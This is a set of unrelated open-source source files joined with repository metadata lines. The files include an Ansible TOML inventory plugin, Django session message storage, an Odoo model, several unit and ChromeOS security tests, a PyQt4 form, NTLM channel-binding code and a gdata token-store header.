ansible_port = 222
[apache.hosts.tomcat1]
[apache.hosts.tomcat2]
myvar = 34
[apache.hosts.tomcat3]
mysecret = "03#pa33w0rd"
[nginx.hosts.jenkins1]
[nginx.vars]
has_java = true
# Example 3
[ungrouped.hosts]
host1 = {}
host2 = { ansible_host = "127.0.0.1", ansible_port = 44 }
host3 = { ansible_host = "127.0.0.1", ansible_port = 45 }
[g1.hosts]
host4 = {}
[g2.hosts]
host4 = {}
'''
import os
from functools import partial
from ansible.errors import AnsibleFileNotFound, AnsibleParserError
from ansible.module_utils._text import to_bytes, to_native, to_text
from ansible.module_utils.common._collections_compat import MutableMapping, MutableSequence
from ansible.module_utils.six import string_types, text_type
from ansible.parsing.yaml.objects import AnsibleSequence, AnsibleUnicode
from ansible.plugins.inventory import BaseFileInventoryPlugin
from ansible.utils.display import Display
from ansible.utils.unsafe_proxy import AnsibleUnsafeBytes, AnsibleUnsafeText
try:
import toml
HAS_TOML = True
except ImportError:
HAS_TOML = False
display = Display()
if HAS_TOML and hasattr(toml, 'TomlEncoder'):
class AnsibleTomlEncoder(toml.TomlEncoder):
def __init__(self, *args, **kwargs):
super(AnsibleTomlEncoder, self).__init__(*args, **kwargs)
# Map our custom YAML object types to dump_funcs from ``toml``
self.dump_funcs.update({
AnsibleSequence: self.dump_funcs.get(list),
AnsibleUnicode: self.dump_funcs.get(str),
AnsibleUnsafeBytes: self.dump_funcs.get(str),
AnsibleUnsafeText: self.dump_funcs.get(str),
})
toml_dumps = partial(toml.dumps, encoder=AnsibleTomlEncoder())
else:
def toml_dumps(data):
return toml.dumps(convert_yaml_objects_to_native(data))
def convert_yaml_objects_to_native(obj):
"""Older versions of the ``toml`` python library, don't have a pluggable
way to tell the encoder about custom types, so we need to ensure objects
that we pass are native types.
Only used on ``toml<0.10.0`` where ``toml.TomlEncoder`` is missing.
This function recurses an object and ensures we cast any of the types from
``ansible.parsing.yaml.objects`` into their native types, effectively cleansing
the data before we hand it over to ``toml``
This function doesn't directly check for the types from ``ansible.parsing.yaml.objects``
but instead checks for the types those objects inherit from, to offer more flexibility.
"""
if isinstance(obj, dict):
return dict((k, convert_yaml_objects_to_native(v)) for k, v in obj.items())
elif isinstance(obj, list):
return [convert_yaml_objects_to_native(v) for v in obj]
elif isinstance(obj, text_type):
return text_type(obj)
else:
return obj
class InventoryModule(BaseFileInventoryPlugin):
NAME = 'toml'
def _parse_group(self, group, group_data):
if group_data is not None and not isinstance(group_data, MutableMapping):
self.display.warning("Skipping '%s' as this is not a valid group definition" % group)
return
group = self.inventory.add_group(group)
if group_data is None:
return
for key, data in group_data.items():
if key == 'vars':
if not isinstance(data, MutableMapping):
raise AnsibleParserError(
'Invalid "vars" entry for "%s" group, requires a dict, found "%s" instead.' %
(group, type(data))
)
for var, value in data.items():
self.inventory.set_variable(group, var, value)
elif key == 'children':
if not isinstance(data, MutableSequence):
raise AnsibleParserError(
'Invalid "children" entry for "%s" group, requires a list, found "%s" instead.' %
(group, type(data))
)
for subgroup in data:
self._parse_group(subgroup, {})
self.inventory.add_child(group, subgroup)
elif key == 'hosts':
if not isinstance(data, MutableMapping):
raise AnsibleParserError(
'Invalid "hosts" entry for "%s" group, requires a dict, found "%s" instead.' %
(group, type(data))
)
for host_pattern, value in data.items():
hosts, port = self._expand_hostpattern(host_pattern)
self._populate_host_vars(hosts, value, group, port)
else:
self.display.warning(
'Skipping unexpected key "%s" in group "%s", only "vars", "children" and "hosts" are valid' %
(key, group)
)
def _load_file(self, file_name):
if not file_name or not isinstance(file_name, string_types):
raise AnsibleParserError("Invalid filename: '%s'" % to_native(file_name))
b_file_name = to_bytes(self.loader.path_dwim(file_name))
if not self.loader.path_exists(b_file_name):
raise AnsibleFileNotFound("Unable to retrieve file contents", file_name=file_name)
try:
(b_data, private) = self.loader._get_file_contents(file_name)
return toml.loads(to_text(b_data, errors='surrogate_or_strict'))
except toml.TomlDecodeError as e:
raise AnsibleParserError(
'TOML file (%s) is invalid: %s' % (file_name, to_native(e)),
orig_exc=e
)
except (IOError, OSError) as e:
raise AnsibleParserError(
"An error occurred while trying to read the file '%s': %s" % (file_name, to_native(e)),
orig_exc=e
)
except Exception as e:
raise AnsibleParserError(
"An unexpected error occurred while parsing the file '%s': %s" % (file_name, to_native(e)),
orig_exc=e
)
def parse(self, inventory, loader, path, cache=True):
''' parses the inventory file '''
if not HAS_TOML:
raise AnsibleParserError(
'The TOML inventory plugin requires the python "toml" library'
)
super(InventoryModule, self).parse(inventory, loader, path)
self.set_options()
try:
data = self._load_file(path)
except Exception as e:
raise AnsibleParserError(e)
if not data:
raise AnsibleParserError('Parsed empty TOML file')
elif data.get('plugin'):
raise AnsibleParserError('Plugin configuration TOML file, not TOML inventory')
for group_name in data:
self._parse_group(group_name, data[group_name])
def verify_file(self, path):
if super(InventoryModule, self).verify_file(path):
file_name, ext = os.path.splitext(path)
if ext == '.toml':
return True
return False
| gpl-3.0 |
cntnboys/410Lab6 | build/django/django/contrib/messages/storage/session.py | 288 | 1705 | import json
from django.contrib.messages.storage.base import BaseStorage
from django.contrib.messages.storage.cookie import MessageEncoder, MessageDecoder
from django.utils import six
class SessionStorage(BaseStorage):
"""
Stores messages in the session (that is, django.contrib.sessions).
"""
session_key = '_messages'
def __init__(self, request, *args, **kwargs):
assert hasattr(request, 'session'), "The session-based temporary "\
"message storage requires session middleware to be installed, "\
"and come before the message middleware in the "\
"MIDDLEWARE_CLASSES list."
super(SessionStorage, self).__init__(request, *args, **kwargs)
def _get(self, *args, **kwargs):
"""
Retrieves a list of messages from the request's session. This storage
always stores everything it is given, so return True for the
all_retrieved flag.
"""
return self.deserialize_messages(self.request.session.get(self.session_key)), True
def _store(self, messages, response, *args, **kwargs):
"""
Stores a list of messages to the request's session.
"""
if messages:
self.request.session[self.session_key] = self.serialize_messages(messages)
else:
self.request.session.pop(self.session_key, None)
return []
def serialize_messages(self, messages):
encoder = MessageEncoder(separators=(',', ':'))
return encoder.encode(messages)
def deserialize_messages(self, data):
if data and isinstance(data, six.string_types):
return json.loads(data, cls=MessageDecoder)
return data
| apache-2.0 |
Vauxoo/stock-logistics-warehouse | stock_orderpoint_uom/models/stock_warehouse_orderpoint.py | 2 | 1028 | # Copyright 2016-17 Eficent Business and IT Consulting Services S.L.
# (http://www.eficent.com)
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html).
from odoo import api, fields, models, _
from odoo.exceptions import UserError
class Orderpoint(models.Model):
_inherit = "stock.warehouse.orderpoint"
procure_uom_id = fields.Many2one(comodel_name='uom.uom',
string="Procurement UoM")
@api.constrains('product_id', 'procure_uom_id')
def _check_procure_uom(self):
if any(orderpoint.product_uom and
orderpoint.procure_uom_id and
orderpoint.product_uom.category_id !=
orderpoint.procure_uom_id.category_id
for orderpoint in self):
raise UserError(
_('Error: The product default Unit of Measure and '
'the procurement Unit of Measure must be in the '
'same category.'))
return True
| agpl-3.0 |
tpokorra/pykolab | tests/unit/test-005-timezone.py | 2 | 2718 | import datetime
import icalendar
import os
import pytz
import unittest
from pykolab.xml import Attendee
from pykolab.xml import Event
from pykolab.xml import EventIntegrityError
from pykolab.xml import InvalidAttendeeParticipantStatusError
from pykolab.xml import InvalidEventDateError
from pykolab.xml import event_from_ical
class TestTimezone(unittest.TestCase):
def test_001_timezone_conflict(self):
#class datetime.timedelta([days[, seconds[, microseconds[, milliseconds[, minutes[, hours[, weeks]]]]]]])
tdelta = datetime.timedelta(0, 0, 0, 0, 0, 1)
event_start = datetime.datetime.now(pytz.timezone("UTC"))
event_end = datetime.datetime.now(pytz.timezone("UTC")) + tdelta
london = Event()
london.set_organizer("john.doe@example.org", "Doe, John")
london.add_attendee("resource-car-vw@example.org", cutype="RESOURCE")
london.set_start(event_start.replace(tzinfo=pytz.timezone("Europe/London")))
london.set_end(event_end.replace(tzinfo=pytz.timezone("Europe/London")))
zurich = Event()
zurich.set_organizer("john.doe@example.org", "Doe, John")
zurich.add_attendee("resource-car-vw@example.org", cutype="RESOURCE")
zurich.set_start(event_start.replace(tzinfo=pytz.timezone("Europe/Zurich")))
zurich.set_end(event_end.replace(tzinfo=pytz.timezone("Europe/Zurich")))
london_xml = london.__str__()
zurich_xml = zurich.__str__()
#print london_xml
#print zurich_xml
london_itip = london.as_string_itip()
zurich_itip = zurich.as_string_itip()
del london, zurich
#print london_itip
#print zurich_itip
london_cal = icalendar.Calendar.from_ical(london_itip)
london = event_from_ical(london_cal.walk('VEVENT')[0].to_ical())
zurich_cal = icalendar.Calendar.from_ical(zurich_itip)
zurich = event_from_ical(zurich_cal.walk('VEVENT')[0].to_ical())
#fp = open(os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'event-london1')), 'w')
#fp.write(london_xml)
#fp.close()
#fp = open(os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'event-london2')), 'w')
#fp.write(london.__str__())
#fp.close()
#fp = open(os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'event-zurich1')), 'w')
#fp.write(zurich_xml)
#fp.close()
#fp = open(os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'event-zurich2')), 'w')
#fp.write(zurich.__str__())
#fp.close()
self.assertEqual(london_xml, london.__str__())
self.assertEqual(zurich_xml, zurich.__str__())
| gpl-3.0 |
robclark/chromium | chrome/test/functional/chromeos_security.py | 9 | 9404 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import pyauto_functional
import pyauto
class ChromeosSecurity(pyauto.PyUITest):
"""Security tests for chrome on ChromeOS.
Requires ChromeOS to be logged in.
"""
def setUp(self):
pyauto.PyUITest.setUp(self)
baseline_file = os.path.abspath(os.path.join(
pyauto.PyUITest.DataDir(), 'pyauto_private', 'chromeos',
'security', 'extension_permission_baseline.txt'))
self.assertTrue(os.path.exists(baseline_file),
msg='Baseline info file does not exist.')
baseline_info = self.EvalDataFrom(baseline_file)
self._bundled_crx_directory = baseline_info['BUNDLED_CRX_DIRECTORY']
self._bundled_crx_baseline = baseline_info['BUNDLED_CRX_BASELINE']
self._component_extension_baseline = (
baseline_info['COMPONENT_EXTENSION_BASELINE'])
if self.GetBrowserInfo()['properties']['is_official']:
self._component_extension_baseline.extend(
baseline_info['OFFICIAL_COMPONENT_EXTENSIONS'])
def ExtraChromeFlags(self):
"""Override default list of extra flags typically used with automation.
See the default flags used with automation in pyauto.py.
Chrome flags for this test should be as close to reality as possible.
"""
return [
'--homepage=about:blank',
]
def testCannotViewLocalFiles(self):
"""Verify that local files cannot be accessed from the browser."""
urls_and_titles = {
'file:///': 'Index of /',
'file:///etc/': 'Index of /etc/',
self.GetFileURLForDataPath('title2.html'): 'Title Of Awesomeness',
}
for url, title in urls_and_titles.iteritems():
self.NavigateToURL(url)
self.assertNotEqual(title, self.GetActiveTabTitle(),
msg='Could access local file %s.' % url)
def _AssertPermissionSetIsExpected(self, expected_set, actual_set, perm_type,
full_expected_info, full_actual_info):
"""Asserts that the set of permissions for an extension is expected.
Args:
expected_set: A set of permissions that are expected to be present.
actual_set: A set of permissions that are actually present.
perm_type: A string describing the type of permission involved.
full_expected_info: A dictionary fully describing the expected information
associated with the given extension.
full_actual_info: A dictionary fully describing the actual information
associated with the given extension.
"""
def _GetSetDifferenceMessage(expected_set, actual_set):
strings = []
for missing_item in expected_set.difference(actual_set):
strings.append('Missing item: "%s"' % missing_item)
for extra_item in actual_set.difference(expected_set):
strings.append('Unexpected (extra) item: "%s"' % extra_item)
return '\n'.join(strings)
self.assertEqual(
expected_set, actual_set,
msg=('%s do not match for "%s".\n'
'%s\n'
'Expected extension info:\n%s'
'\nActual extension info:\n%s' %
(perm_type, full_expected_info['name'],
_GetSetDifferenceMessage(expected_set, actual_set),
self.pformat(full_expected_info),
self.pformat(full_actual_info))))
def _AssertExtensionNamesAreExpected(self, expected_set, actual_set,
ext_type, full_expected_info,
full_actual_info):
"""Asserts that a set of extensions is expected.
Args:
expected_set: A set of extension names that are expected to be present.
actual_set: A set of extension names that are actually present.
ext_type: A string describing the type of extensions involved.
full_expected_info: A list of dictionaries describing the expected
information for all extensions.
full_actual_info: A list of dictionaries describing the actual information
for all extensions.
"""
# Skip the Web Store and Bookmark Manager; they are integral to Chrome and
# are redundant to check on ChromeOS. This can reduce the number of times
# we have to update the baseline for this test.
for extension_name in ['Chrome Web Store', 'Bookmark Manager']:
actual_set.discard(extension_name)
def _GetSetDifferenceMessage(expected_set, actual_set):
strings = []
for missing_item in expected_set.difference(actual_set):
strings.append('Missing item: "%s"' % missing_item)
located_ext_info = [info for info in full_expected_info if
info['name'] == missing_item][0]
strings.append(self.pformat(located_ext_info))
for extra_item in actual_set.difference(expected_set):
strings.append('Unexpected (extra) item: "%s"' % extra_item)
located_ext_info = [info for info in full_actual_info if
info['name'] == extra_item][0]
strings.append(self.pformat(located_ext_info))
return '\n'.join(strings)
self.assertEqual(
expected_set, actual_set,
msg='%s names do not match the baseline.\n'
'%s\n' %
(ext_type, _GetSetDifferenceMessage(expected_set, actual_set)))
def _VerifyExtensionPermissions(self, baseline):
"""Ensures extension permissions in the baseline match actual info.
This function will fail the current test if either (1) an extension named
in the baseline is not currently installed in Chrome; or (2) the api
permissions or effective host permissions of an extension in the baseline
do not match the actual permissions associated with the extension in Chrome.
Args:
baseline: A dictionary of expected extension information, containing
extension names and api/effective host permission info.
"""
full_ext_actual_info = self.GetExtensionsInfo()
for ext_expected_info in baseline:
located_ext_info = [info for info in full_ext_actual_info if
info['name'] == ext_expected_info['name']]
self.assertTrue(
located_ext_info,
msg=('Cannot locate extension info for "%s".\n'
'Expected extension info:\n%s' %
(ext_expected_info['name'], self.pformat(ext_expected_info))))
ext_actual_info = located_ext_info[0]
self._AssertPermissionSetIsExpected(
set(ext_expected_info['effective_host_permissions']),
set(ext_actual_info['effective_host_permissions']),
'Effective host permissions', ext_expected_info, ext_actual_info)
self._AssertPermissionSetIsExpected(
set(ext_expected_info['api_permissions']),
set(ext_actual_info['api_permissions']),
'API permissions', ext_expected_info, ext_actual_info)
def testComponentExtensionPermissions(self):
"""Ensures component extension permissions are as expected."""
expected_names = [ext['name'] for ext in self._component_extension_baseline]
ext_actual_info = self.GetExtensionsInfo()
actual_names = [ext['name'] for ext in ext_actual_info if
ext['is_component']]
self._AssertExtensionNamesAreExpected(
set(expected_names), set(actual_names), 'Component extension',
self._component_extension_baseline, ext_actual_info)
self._VerifyExtensionPermissions(self._component_extension_baseline)
def testBundledCrxPermissions(self):
"""Ensures bundled CRX permissions are as expected."""
# Verify that each bundled CRX on the device is expected, then install it.
for file_name in os.listdir(self._bundled_crx_directory):
if file_name.endswith('.crx'):
self.assertTrue(
file_name in [x['crx_file'] for x in self._bundled_crx_baseline],
msg='Unexpected CRX file: ' + file_name)
crx_file = os.path.join(self._bundled_crx_directory, file_name)
self.InstallExtension(crx_file)
# Verify that the permissions information in the baseline matches the
# permissions associated with the installed bundled CRX extensions.
self._VerifyExtensionPermissions(self._bundled_crx_baseline)
def testNoUnexpectedExtensions(self):
"""Ensures there are no unexpected bundled or component extensions."""
# Install all bundled extensions on the device.
for file_name in os.listdir(self._bundled_crx_directory):
if file_name.endswith('.crx'):
crx_file = os.path.join(self._bundled_crx_directory, file_name)
self.InstallExtension(crx_file)
# Ensure that the set of installed extension names precisely matches the
# baseline.
expected_names = [ext['name'] for ext in self._component_extension_baseline]
expected_names.extend([ext['name'] for ext in self._bundled_crx_baseline])
ext_actual_info = self.GetExtensionsInfo()
installed_names = [ext['name'] for ext in ext_actual_info]
self._AssertExtensionNamesAreExpected(
set(expected_names), set(installed_names), 'Installed extension',
self._component_extension_baseline + self._bundled_crx_baseline,
ext_actual_info)
if __name__ == '__main__':
pyauto_functional.Main()
| bsd-3-clause |
shrinidhi666/rbhus | rbhusUI/lib/rbhusPipeProjCreateMod.py | 1 | 10841 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'rbhusPipeProjCreateMod.ui'
#
# Created: Tue Aug 18 09:42:16 2015
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(420, 335)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.gridLayout = QtGui.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.labelDesc = QtGui.QLabel(self.centralwidget)
self.labelDesc.setObjectName(_fromUtf8("labelDesc"))
self.gridLayout.addWidget(self.labelDesc, 8, 0, 1, 1)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem, 10, 0, 1, 2)
self.labelDue = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.labelDue.sizePolicy().hasHeightForWidth())
self.labelDue.setSizePolicy(sizePolicy)
self.labelDue.setObjectName(_fromUtf8("labelDue"))
self.gridLayout.addWidget(self.labelDue, 4, 0, 1, 1)
self.checkRI = QtGui.QCheckBox(self.centralwidget)
self.checkRI.setEnabled(False)
self.checkRI.setChecked(True)
self.checkRI.setObjectName(_fromUtf8("checkRI"))
self.gridLayout.addWidget(self.checkRI, 13, 0, 1, 3)
self.labelProj_2 = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.labelProj_2.sizePolicy().hasHeightForWidth())
self.labelProj_2.setSizePolicy(sizePolicy)
self.labelProj_2.setObjectName(_fromUtf8("labelProj_2"))
self.gridLayout.addWidget(self.labelProj_2, 0, 0, 1, 1)
self.labelName = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.labelName.sizePolicy().hasHeightForWidth())
self.labelName.setSizePolicy(sizePolicy)
self.labelName.setObjectName(_fromUtf8("labelName"))
self.gridLayout.addWidget(self.labelName, 1, 0, 1, 1)
self.labelAclGroup = QtGui.QLabel(self.centralwidget)
self.labelAclGroup.setObjectName(_fromUtf8("labelAclGroup"))
self.gridLayout.addWidget(self.labelAclGroup, 7, 0, 1, 1)
self.labelAdmin = QtGui.QLabel(self.centralwidget)
self.labelAdmin.setObjectName(_fromUtf8("labelAdmin"))
self.gridLayout.addWidget(self.labelAdmin, 5, 0, 1, 1)
self.labelDirectory = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.labelDirectory.sizePolicy().hasHeightForWidth())
self.labelDirectory.setSizePolicy(sizePolicy)
self.labelDirectory.setObjectName(_fromUtf8("labelDirectory"))
self.gridLayout.addWidget(self.labelDirectory, 2, 0, 1, 1)
self.labelAclUser = QtGui.QLabel(self.centralwidget)
self.labelAclUser.setObjectName(_fromUtf8("labelAclUser"))
self.gridLayout.addWidget(self.labelAclUser, 6, 0, 1, 1)
self.labelLinked = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.labelLinked.sizePolicy().hasHeightForWidth())
self.labelLinked.setSizePolicy(sizePolicy)
self.labelLinked.setObjectName(_fromUtf8("labelLinked"))
self.gridLayout.addWidget(self.labelLinked, 9, 0, 1, 1)
self.lineEditLinked = QtGui.QLineEdit(self.centralwidget)
self.lineEditLinked.setObjectName(_fromUtf8("lineEditLinked"))
self.gridLayout.addWidget(self.lineEditLinked, 9, 1, 1, 1)
self.pushLinked = QtGui.QPushButton(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushLinked.sizePolicy().hasHeightForWidth())
self.pushLinked.setSizePolicy(sizePolicy)
self.pushLinked.setObjectName(_fromUtf8("pushLinked"))
self.gridLayout.addWidget(self.pushLinked, 9, 2, 1, 1)
self.lineEditDesc = QtGui.QLineEdit(self.centralwidget)
self.lineEditDesc.setText(_fromUtf8(""))
self.lineEditDesc.setObjectName(_fromUtf8("lineEditDesc"))
self.gridLayout.addWidget(self.lineEditDesc, 8, 1, 1, 2)
self.lineEditAclGroup = QtGui.QLineEdit(self.centralwidget)
self.lineEditAclGroup.setEnabled(False)
self.lineEditAclGroup.setObjectName(_fromUtf8("lineEditAclGroup"))
self.gridLayout.addWidget(self.lineEditAclGroup, 7, 1, 1, 2)
self.lineEditAclUser = QtGui.QLineEdit(self.centralwidget)
self.lineEditAclUser.setEnabled(False)
self.lineEditAclUser.setObjectName(_fromUtf8("lineEditAclUser"))
self.gridLayout.addWidget(self.lineEditAclUser, 6, 1, 1, 2)
self.dateEditDue = QtGui.QDateTimeEdit(self.centralwidget)
self.dateEditDue.setCalendarPopup(True)
self.dateEditDue.setObjectName(_fromUtf8("dateEditDue"))
self.gridLayout.addWidget(self.dateEditDue, 4, 1, 1, 2)
self.comboDirectory = QtGui.QComboBox(self.centralwidget)
self.comboDirectory.setObjectName(_fromUtf8("comboDirectory"))
self.gridLayout.addWidget(self.comboDirectory, 2, 1, 1, 2)
self.lineEditName = QtGui.QLineEdit(self.centralwidget)
self.lineEditName.setObjectName(_fromUtf8("lineEditName"))
self.gridLayout.addWidget(self.lineEditName, 1, 1, 1, 2)
self.comboProjType = QtGui.QComboBox(self.centralwidget)
self.comboProjType.setObjectName(_fromUtf8("comboProjType"))
self.gridLayout.addWidget(self.comboProjType, 0, 1, 1, 2)
self.line = QtGui.QFrame(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.MinimumExpanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.line.sizePolicy().hasHeightForWidth())
self.line.setSizePolicy(sizePolicy)
self.line.setFrameShape(QtGui.QFrame.HLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName(_fromUtf8("line"))
self.gridLayout.addWidget(self.line, 11, 0, 1, 3)
self.pushCreate = QtGui.QPushButton(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.MinimumExpanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushCreate.sizePolicy().hasHeightForWidth())
self.pushCreate.setSizePolicy(sizePolicy)
self.pushCreate.setObjectName(_fromUtf8("pushCreate"))
self.gridLayout.addWidget(self.pushCreate, 14, 0, 1, 3)
self.lineEditAdmins = QtGui.QLineEdit(self.centralwidget)
self.lineEditAdmins.setObjectName(_fromUtf8("lineEditAdmins"))
self.gridLayout.addWidget(self.lineEditAdmins, 5, 1, 1, 1)
self.pushUsers = QtGui.QPushButton(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushUsers.sizePolicy().hasHeightForWidth())
self.pushUsers.setSizePolicy(sizePolicy)
self.pushUsers.setObjectName(_fromUtf8("pushUsers"))
self.gridLayout.addWidget(self.pushUsers, 5, 2, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.statusBar = QtGui.QStatusBar(MainWindow)
self.statusBar.setObjectName(_fromUtf8("statusBar"))
MainWindow.setStatusBar(self.statusBar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Rbhus Pipe NEW PROJECT", None))
self.labelDesc.setToolTip(_translate("MainWindow", "group owner of the project directory", None))
self.labelDesc.setText(_translate("MainWindow", "description", None))
self.labelDue.setText(_translate("MainWindow", "due date", None))
self.checkRI.setText(_translate("MainWindow", "rbhusRender intergration", None))
self.labelProj_2.setText(_translate("MainWindow", "projType", None))
self.labelName.setText(_translate("MainWindow", "name", None))
self.labelAclGroup.setToolTip(_translate("MainWindow", "group owner of the project directory", None))
self.labelAclGroup.setText(_translate("MainWindow", "aclGroup", None))
self.labelAdmin.setText(_translate("MainWindow", "admins", None))
self.labelDirectory.setWhatsThis(_translate("MainWindow", "directory to store the output data from file. eg : rendered output of lighting files.", None))
self.labelDirectory.setText(_translate("MainWindow", "directory", None))
self.labelAclUser.setToolTip(_translate("MainWindow", "user owner of the project directory", None))
self.labelAclUser.setText(_translate("MainWindow", "aclUser", None))
self.labelLinked.setText(_translate("MainWindow", "linked", None))
self.lineEditLinked.setText(_translate("MainWindow", "default", None))
self.pushLinked.setText(_translate("MainWindow", "select", None))
self.lineEditDesc.setToolTip(_translate("MainWindow", "group owner of the project directory", None))
self.lineEditAclGroup.setToolTip(_translate("MainWindow", "group owner of the project directory", None))
self.lineEditAclGroup.setText(_translate("MainWindow", "artist", None))
self.lineEditAclUser.setToolTip(_translate("MainWindow", "user owner of the project directory", None))
self.lineEditAclUser.setText(_translate("MainWindow", "kryptos", None))
self.pushCreate.setText(_translate("MainWindow", "create", None))
self.lineEditAdmins.setToolTip(_translate("MainWindow", "list of comma separated usernames", None))
self.pushUsers.setText(_translate("MainWindow", "select", None))
| gpl-3.0 |
jborean93/ntlm-auth | ntlm_auth/gss_channel_bindings.py | 1 | 2499 | # Copyright: (c) 2018, Jordan Borean (@jborean93) <jborean93@gmail.com>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
import struct
class GssChannelBindingsStruct(object):
INITIATOR_ADDTYPE = 'initiator_addtype'
INITIATOR_ADDRESS_LENGTH = 'initiator_address_length'
ACCEPTOR_ADDRTYPE = 'acceptor_addrtype'
ACCEPTOR_ADDRESS_LENGTH = 'acceptor_address_length'
APPLICATION_DATA_LENGTH = 'application_data_length'
INITIATOR_ADDRESS = 'initiator_address'
ACCEPTOR_ADDRESS = 'acceptor_address'
APPLICATION_DATA = 'application_data'
def __init__(self):
"""
Used to send the out of band channel info as part of the authentication
process. This is used as a way of verifying the target is who it says
it is as this information is provided by the higher layer. In most
cases, the CBT is just the hash of the server's TLS certificate to the
application_data field.
This bytes string of the packed structure is then MD5 hashed and
included in the NTv2 response.
"""
self.fields = {
self.INITIATOR_ADDTYPE: 0,
self.INITIATOR_ADDRESS_LENGTH: 0,
self.ACCEPTOR_ADDRTYPE: 0,
self.ACCEPTOR_ADDRESS_LENGTH: 0,
self.APPLICATION_DATA_LENGTH: 0,
self.INITIATOR_ADDRESS: b"",
self.ACCEPTOR_ADDRESS: b"",
self.APPLICATION_DATA: b""
}
def __setitem__(self, key, value):
self.fields[key] = value
def __getitem__(self, key):
return self.fields[key]
def get_data(self):
# Set the lengths of each len field in case they have changed
self[self.INITIATOR_ADDRESS_LENGTH] = len(self[self.INITIATOR_ADDRESS])
self[self.ACCEPTOR_ADDRESS_LENGTH] = len(self[self.ACCEPTOR_ADDRESS])
self[self.APPLICATION_DATA_LENGTH] = len(self[self.APPLICATION_DATA])
# Add all the values together to create the gss_channel_bindings_struct
data = struct.pack("<L", self[self.INITIATOR_ADDTYPE])
data += struct.pack("<L", self[self.INITIATOR_ADDRESS_LENGTH])
data += self[self.INITIATOR_ADDRESS]
data += struct.pack("<L", self[self.ACCEPTOR_ADDRTYPE])
data += struct.pack("<L", self[self.ACCEPTOR_ADDRESS_LENGTH])
data += self[self.ACCEPTOR_ADDRESS]
data += struct.pack("<L", self[self.APPLICATION_DATA_LENGTH])
data += self[self.APPLICATION_DATA]
return data
| mit |
sudheesh001/oh-mainline | vendor/packages/gdata/src/atom/token_store.py | 280 | 4048 | #!/usr/bin/python
#
# Copyright (C) 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides a TokenStore class which is designed to manage
auth tokens required for different services.
Each token is valid for a set of scopes which is the start of a URL. An HTTP
client will use a token store to find a valid Authorization header to send
in requests to the specified URL. If the HTTP client determines that a token
has expired or been revoked, it can remove the token from the store so that
it will not be used in future requests.
"""
__author__ = 'api.jscudder (Jeff Scudder)'
